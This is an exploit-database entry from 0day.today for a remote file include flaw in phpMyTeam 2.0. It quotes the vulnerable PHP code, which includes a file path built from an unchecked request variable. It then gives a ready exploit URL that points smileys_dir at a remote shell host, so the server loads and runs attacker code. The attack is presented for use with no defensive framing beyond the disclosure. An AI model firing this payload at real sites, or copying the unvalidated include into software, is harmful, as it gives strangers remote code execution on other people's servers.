[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpMyTeam <= 2.0 (smileys_dir) Remote File Include Vulnerability

Author
xoron
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-924
Category
web applications
Date add
04-10-2006
Platform
unsorted
================================================================
phpMyTeam <= 2.0 (smileys_dir) Remote File Include Vulnerability
================================================================



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

phpMyTeam v2.0 <= (smileys_dir) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by XORON(turkish hacker)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

URL: http://www.phpscripts-fr.net/scripts/download.php?id=1627

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Vuln. Code:

$smiley_pack_path = $smileys_dir.$smiley_pack_name.'/';
@include($smiley_pack_path.'smileys.php');

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit: /images/smileys/smileys_packs.php?smileys_dir=http://sh3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: Preddy, Ironfist, Stansar, SHiKaA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



#  0day.today [2024-11-16]  #